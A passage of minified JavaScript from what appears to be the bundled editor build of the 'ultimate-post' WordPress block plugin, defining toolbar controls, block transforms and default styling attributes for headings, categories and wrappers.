Alignment","ultimate-post")})):"dropdown"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(i.lj,{store:l,attrKey:t.key,options:t.options,label:t.label})):"feat_toggle"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{contentClassName:"ultp-custom-toolbar-wrapper",renderToggle:({onToggle:e})=>(0,o.createElement)("span",null,(0,o.createElement)(y,{label:t.label||"Features",icon:t.icon||p.Z.setting,onClick:()=>e()})),renderContent:()=>(0,o.createElement)(i.wI,{exclude:t.exclude,include:t.include,label:t.label,store:l,data:t.data,new:t.new,dep:t.dep,pro:t.pro})})):"grid_spacing"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(r.Z,{buttonContent:i.HT,include:(0,i.i_)({include:t.include,exclude:t.exclude}),store:l,label:__("Grid Spacing","ultimate-post")})):"linkbutton"==t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-link-toolbar",renderToggle:({onToggle:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(y,{className:"ultp-link-toolbar__btn",name:"link",label:"Link",icon:n.ZP.link,onClick:()=>e()})),renderContent:()=>(0,o.createElement)(a.Z,{onlyLink:t.onlyLink,value:t.value,text:t?.text,label:t.label,store:l,placeholder:t.placeholder,onChange:e=>l.setAttributes({[t.key]:e})})})):"adv_filter"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-query-toolbar",renderToggle:({onToggle:e})=>(0,o.createElement)("span",{className:"ultp-query-toolbar__btn"},(0,o.createElement)(y,{label:__("Settings","ultimate-post"),icon:p.Z.setting,onClick:()=>e()})),renderContent:()=>(0,o.createElement)("div",{className:"ultp-field-wrap"},(0,o.createElement)(i.T,{include:i.wK,store:l,initialOpen:!0}))})):"inserter"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(y,{icon:p.Z.add,label:t.label||__("Insert Blocks","ultimate-post"),onClick:()=>{if(null!=wp.data.dispatch("core/editor").setIsInserterOpened)wp.data.dispatch("core/editor").setIsInserterOpened({rootClientId:t.clientId,insertionIndex:99});else{if(null==wp.data.dispatch("core/edit-post").setIsInserterOpened)return!1;wp.data.dispatch("core/edit-post").setIsInserterOpened({rootClientId:t.clientId,insertionIndex:99})}}})):"custom"===t.type?(0,o.createElement)(m,{key:c},(0,o.createElement)(g,{key:c,contentClassName:"ultp-custom-toolbar-wrapper",renderToggle:({onToggle:e})=>(0,o.createElement)("span",null,(0,o.createElement)(y,{label:t.label||"Settings",icon:t.icon||n.ZP.cog_line,onClick:()=>e()})),renderContent:()=>e.children})):void 0})))})},83100:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(82044);const a=(e,t,l,a)=>(0,o.Z)({url:e||null,utmKey:t||null,affiliate:l||null,hash:a||null})},25335:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(64766),i=l(69735);const{__}=wp.i18n,{RichText:n}=wp.blockEditor,r=e=>{const{headingShow:t,headingStyle:l,headingAlign:r,headingURL:s,headingText:p,setAttributes:c,headingBtnText:u,subHeadingShow:d,subHeadingText:m,headingTag:g,dcEnabled:y=!1}=e.props,b=g?`${g}`:"h3",v=e=>{c({headingText:e})};return(0,o.createElement)(o.Fragment,null,t&&(0,o.createElement)("div",{className:`ultp-heading-wrap ultp-heading-${l} ultp-heading-${r}`},s?(0,o.createElement)(b,{className:"ultp-heading-inner"},(0,o.createElement)("a",null,(0,o.createElement)(n,{key:"editable",tagName:"span",placeholder:__("Add Text…","ultimate-post"),onChange:v,value:p,allowedformats:y?["ultimate-post/dynamic-content"]:void 0}))):(0,o.createElement)(b,{className:"ultp-heading-inner"},(0,o.createElement)(n,{key:"editable",tagName:"span",placeholder:__("Add Text…","ultimate-post"),onChange:v,value:p,allowedFormats:(0,i.o6)()&&y?["ultimate-post/dynamic-content"]:void 0})),"style11"==l&&s&&(0,o.createElement)("a",{className:"ultp-heading-btn"},u,a.ZP.rightAngle2),d&&(0,o.createElement)("div",{className:"ultp-sub-heading"},(0,o.createElement)(n,{key:"editable",tagName:"div",className:"ultp-sub-heading-inner",placeholder:__("Add Text…","ultimate-post"),allowedFormats:[],onChange:e=>c({subHeadingText:e}),value:m}))))}},67594:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});const{createBlock:o}=wp.blocks,a=["ultimate-post/post-grid-1","ultimate-post/post-grid-2","ultimate-post/post-grid-3","ultimate-post/post-grid-4","ultimate-post/post-grid-5","ultimate-post/post-grid-6","ultimate-post/post-grid-7"],i={gridBlocks:a,listBlocks:["ultimate-post/post-list-1","ultimate-post/post-list-2","ultimate-post/post-list-3","ultimate-post/post-list-4"]},n=(e="",t="gridBlocks")=>(""!==e?i[t].filter((t=>t!==e)):a).map((e=>({type:"block",blocks:[e],transform:(t,l)=>o(e,{previewImg:`${ultp_data.url}assets/img/preview/${e.split("/")[1].replace(/-/g,"")}.svg`,contentAlign:t.contentAlign,advPaginationEnable:t.advPaginationEnable,advFilterEnable:t.advFilterEnable,metaShow:t.metaShow,metaTypo:t.metaTypo,metaColor:t.metaColor,metaList:t.metaList,excerptColor:t.excerptColor,excerptTypo:t.excerptTypo,excerptShow:t.excerptShow,imgAnimation:t.imgAnimation,catShow:t?.catShow,queryQuick:t.queryQuick,queryType:t.queryType,queryTax:t.queryTax,queryTaxValue:t.queryTaxValue,queryRelation:t.queryRelation,queryOrderBy:t.queryOrderBy,metaKey:t.metaKey,queryOrder:t.queryOrder,queryInclude:t.queryInclude,queryExclude:t.queryExclude,queryAuthor:t.queryAuthor,queryOffset:t.queryOffset,queryExcludeTerm:t.queryExcludeTerm,queryExcludeAuthor:t.queryExcludeAuthor,querySticky:t.querySticky,queryUnique:t.queryUnique,queryPosts:t.queryPosts,queryCustomPosts:t.queryCustomPosts,catBgHoverColor:t.catBgHoverColor,catPadding:t.catPadding,catHoverColor:t.catHoverColor,catRadius:t.catRadius,catBorder:t.catBorder,catBgColor:t.catBgColor,catColor:t.catColor,catTypo:t.catTypo,titleColor:t.titleColor,titleTypo:t.titleTypo,wrapBg:t.wrapBg,wrapOuterPadding:t.wrapOuterPadding},l)})))},20107:(e,t,l)=>{"use strict";function o(e){let t,l,a="";if("string"==typeof e||"number"==typeof e)a+=e;else if("object"==typeof e)if(Array.isArray(e)){const i=e.length;for(t=0;t<i;t++)e[t]&&(l=o(e[t]))&&(a&&(a+=" "),a+=l)}else for(l in e)e[l]&&(a&&(a+=" "),a+=l);return a}function a(){let e,t,l=0,a="",i=arguments.length;for(;l<i;l++)(e=arguments[l])&&(t=o(e))&&(a&&(a+=" "),a+=t);return a}l.d(t,{Z:()=>a})},36557:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={loadingColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-loading .ultp-loading-blocks div { --loading-block-color: {{loadingColor}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-wrapper{z-index:{{advanceZindex}};}"}]},wrapBg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5"},style:[{selector:"{{ULTP}} .ultp-block-wrapper"}]},wrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-wrapper"}]},wrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-wrapper"}]},wrapRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-wrapper { border-radius:{{wrapRadius}}; }"}]},wrapHoverBackground:{type:"object",default:{openColor:0,type:"color",color:"#037fff"},style:[{selector:"{{ULTP}} .ultp-block-wrapper:hover"}]},wrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-wrapper:hover"}]},wrapHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-wrapper:hover { border-radius:{{wrapHoverRadius}}; }"}]},wrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-block-wrapper:hover"}]},wrapMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-wrapper { margin:{{wrapMargin}}; }"}]},wrapOuterPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-wrapper { padding:{{wrapOuterPadding}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},35752:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={catShow:{type:"boolean",default:!0},maxTaxonomy:{type:"string",default:"30"},taxonomy:{type:"string",default:"category"},catStyle:{type:"string",default:"classic"},catPosition:{type:"string",default:"aboveTitle"},customCatColor:{type:"boolean",default:!1},seperatorLink:{type:"string",default:ultp_data.category_url,style:[{depends:[{key:"customCatColor",condition:"==",value:!0}]}]},onlyCatColor:{type:"boolean",default:!1,style:[{depends:[{key:"customCatColor",condition:"==",value:!0}]}]},catLineWidth:{type:"object",default:{lg:"20"},style:[{depends:[{key:"catStyle",condition:"!=",value:"classic"}],selector:"{{ULTP}} .ultp-category-borderRight .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderBoth .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderBoth .ultp-category-in:after, \n            {{ULTP}} .ultp-category-borderLeft .ultp-category-in:before { width:{{catLineWidth}}px; }"}]},catLineSpacing:{type:"object",default:{lg:"30"},style:[{depends:[{key:"catStyle",condition:"!=",value:"classic"}],selector:"{{ULTP}} .ultp-category-borderBoth .ultp-category-in { padding-left: {{catLineSpacing}}px; padding-right: {{catLineSpacing}}px; } \n            {{ULTP}} .ultp-category-borderLeft .ultp-category-in { padding-left: {{catLineSpacing}}px; } \n            {{ULTP}} .ultp-category-borderRight .ultp-category-in { padding-right:{{catLineSpacing}}px; }"}]},catLineColor:{type:"string",default:"#000000",style:[{depends:[{key:"catStyle",condition:"!=",value:"classic"}],selector:"{{ULTP}} .ultp-category-borderRight .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderLeft .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderBoth .ultp-category-in:after, \n            {{ULTP}} .ultp-category-borderBoth .ultp-category-in:before { background:{{catLineColor}}; }"}]},catLineHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"catStyle",condition:"!=",value:"classic"}],selector:"{{ULTP}} .ultp-category-borderBoth:hover .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderBoth:hover .ultp-category-in:after, \n            {{ULTP}} .ultp-category-borderLeft:hover .ultp-category-in:before, \n            {{ULTP}} .ultp-category-borderRight:hover .ultp-category-in:before { background:{{catLineHoverColor}}; }"}]},catTypo:{type:"object",default:{openTypography:1,size:{lg:11,unit:"px"},height:{lg:15,unit:"px"},spacing:{lg:1,unit:"px"},transform:"",weight:"400",decoration:"none",family:""},style:[{depends:[{key:"catShow",condition:"==",value:!0}],selector:"body {{ULTP}} div.ultp-block-wrapper .ultp-block-items-wrap .ultp-block-item .ultp-category-grid a"}]},catColor:{type:"string",default:"#fff",style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-category-grid a { color:{{catColor}}; }"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-category-grid a { color:{{catColor}}; }"}]},catBgColor:{type:"object",default:{openColor:1,type:"color",color:"#000000"},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a"}]},catBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-category-grid a"}]},catRadius:{type:"object",default:{lg:"2",unit:"px"},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a { border-radius:{{catRadius}}; }"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-category-grid a { border-radius:{{catRadius}}; }"}]},catHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-category-grid a:hover { color:{{catHoverColor}}; }"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-category-grid a:hover { color:{{catHoverColor}}; }"}]},catBgHoverColor:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a:hover"}]},catHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a:hover"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-category-grid a:hover"}]},catSacing:{type:"object",default:{lg:{top:5,bottom:5,left:0,right:0,unit:"px"}},style:[{depends:[{key:"catShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-category-grid { margin:{{catSacing}}; }"}]},catPadding:{type:"object",default:{lg:{top:3,bottom:3,left:7,right:7,unit:"px"}},style:[{depends:[{key:"catShow",condition:"==",value:!0},{key:"onlyCatColor",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-category-grid a { padding:{{catPadding}}; }"},{depends:[{key:"catShow",condition:"==",value:!0},{key:"customCatColor",condition:"==",value:!1}],selector:"{{ULTP}} .ultp-category-grid a { padding:{{catPadding}}; }"}]}}},92165:(e,t,l)=>{"use strict";l.d(t,{t:()=>u});var o=l(36557),a=l(35752),i=l(78785),n=l(450),r=l(10733),s=l(13946),p=l(50060),c=l(22886);function u(e,t,l){let u={};const d={meta:n.Z,query:s.Z,video:c.Z,heading:i.Z,category:a.Z,readMore:p.Z,pagination:r.Z,advanceAttr:o.Z,advFilter:{querySearch:{type:"string",default:""},advFilterEnable:{type:"boolean",default:!1},advPaginationEnable:{type:"boolean",default:!1},defQueryTax:{type:"object",default:{}},advRelation:{type:"string",default:"AND"}},pagiBlockCompatibility:{loadMoreText:{type:"string",default:"Load More",style:[{depends:[{key:"paginationType",condition:"==",value:"loadMore"}]}]},paginationText:{type:"string",default:"Previous|Next",style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]},paginationAjax:{type:"boolean",default:!0,style:[{depends:[{key:"paginationType",condition:"==",value:"pagination"}]}]}}};return e?.length>0&&e.forEach((function(e){d[e]?u={...u,...JSON.parse(JSON.stringify(d[e]))}:console.log(e," - This Section not found in Dynamic attr store")})),t?.length>0&&t.forEach((function(e,t){delete u[e]})),l&&l.length>0&&l.forEach((function(e){u[e.key]&&(e?.default||e?.style)?(e?.default&&u[e.key]&&(u[e.key].default=e?.default),e?.style&&(u[e.key].style=e?.style)):console.log(e.key," - This key not found in Dynamic attr store",e?.default)})),u}},78785:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});const o={headingURL:{type:"string",default:""},headingBtnText:{type:"string",default:"View More",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}]}]},headingStyle:{type:"string",default:"style1"},headingTag:{type:"string",default:"h2"},headingAlign:{type:"string",default:"left",style:[{selector:"{{ULTP}} .ultp-heading-inner, \n          {{ULTP}} .ultp-sub-heading-inner { text-align:{{headingAlign}}; }"}]},headingTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",transform:"",family:"",weight:"700"},style:[{selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-inner"}]},headingColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-heading-inner span { color:{{headingColor}}; }"}]},headingBorderBottomColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner { border-bottom-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color: {{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-heading-inner span:before, \n            {{ULTP}} .ultp-heading-inner span:after { background-color: {{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style15"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style16"}],selector:"{{ULTP}} .ultp-heading-inner span:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style17"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:before { border-color:{{headingBorderBottomColor}}; }"}]},headingBorderBottomColor2:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:before { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:after { background-color:{{headingBorderBottomColor2}}; }"}]},headingBg:{type:"string",default:"var(--postx_preset_Base_3_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-style5 .ultp-heading-inner span:before { border-color:{{headingBg}} transparent transparent; } \n            {{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; \n            }"},{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style21"}],selector:"{{ULTP}} .ultp-heading-inner span,\n            {{ULTP}} .ultp-heading-inner span:after { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner span { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner { background-color:{{headingBg}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner span:before { border-color:{{headingBg}} transparent transparent; } \n            {{ULTP}} .ultp-heading-inner { background-color:{{headingBg}}; }"}]},headingBg2:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner { background-color:{{headingBg2}}; }"}]},headingBtnTypo:{type:"object",default:{openTypography:1,size:{lg:"14",unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn"}]},headingBtnColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn { color:{{headingBtnColor}}; } \n            {{ULTP}} .ultp-heading-wrap .ultp-heading-btn svg { color:{{headingBtnColor}}; }"}]},headingBtnHoverColor:{type:"string",default:"var(--postx_preset_Secondary_color)",style:[{depends:[{key:"headingStyle",condition:"==",value:"style11"}],selector:"{{ULTP}} .ultp-heading-wrap .ultp-heading-btn:hover { color:{{headingBtnHoverColor}}; } \n            {{ULTP}} .ultp-heading-wrap .ultp-heading-btn:hover svg { color:{{headingBtnHoverColor}}; }"}]},headingBorder:{type:"string",default:"3",style:[{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner { border-bottom-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span:before { width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-heading-inner span:before, \n            {{ULTP}} .ultp-heading-inner span:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n            {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-heading-inner:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style10"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n            {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style14"}],selector:"{{ULTP}} .ultp-heading-inner:before, \n            {{ULTP}} .ultp-heading-inner:after { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style15"}],selector:"{{ULTP}} .ultp-heading-inner span:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style16"}],selector:"{{ULTP}} .ultp-heading-inner span:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style17"}],selector:"{{ULTP}} .ultp-heading-inner:before { height:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner:after { width:{{headingBorder}}px; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner:after { width:{{headingBorder}}px; }"}]},headingSpacing:{type:"object",default:{lg:20,sm:10,unit:"px"},style:[{selector:"{{ULTP}} .ultp-heading-wrap {margin-top:0; margin-bottom:{{headingSpacing}}; }"}]},headingRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-inner span { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner { border-radius:{{headingRadius}}; }"}]},headingPadding:{type:"object",default:{lg:{unit:"px"}},style:[{depends:[{key:"headingStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style12"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style13"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style18"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style19"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style20"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"},{depends:[{key:"headingStyle",condition:"==",value:"style21"}],selector:"{{ULTP}} .ultp-heading-inner span { padding:{{headingPadding}}; }"}]},subHeadingShow:{type:"boolean",default:!1},subHeadingText:{type:"string",default:"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer ut sem augue. Sed at felis ut enim dignissim sodales.",style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}]}]},subHeadingTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"27",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading div"}]},subHeadingColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading div { color:{{subHeadingColor}}; }"}]},subHeadingSpacing:{type:"object",default:{lg:{top:"8",unit:"px"}},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading-inner { margin:{{subHeadingSpacing}}; }"}]},enableWidth:{type:"toggle",default:!1,style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0}]}]},customWidth:{type:"object",default:{lg:{top:"",unit:"px"}},style:[{depends:[{key:"subHeadingShow",condition:"==",value:!0},{key:"enableWidth",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-sub-heading-inner { max-width:{{customWidth}}; }"}]}};!function e(t,l){const o=[];for(const a in t)a in l?"object"==typeof t[a]&&"object"==typeof l[a]?e(t[a],l[a]).length>0&&o.push(a):t[a]!==l[a]&&o.push(a):o.push(a);for(const e in l)e in t||o.push(e);return o}(o,{});const a=o},450:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const 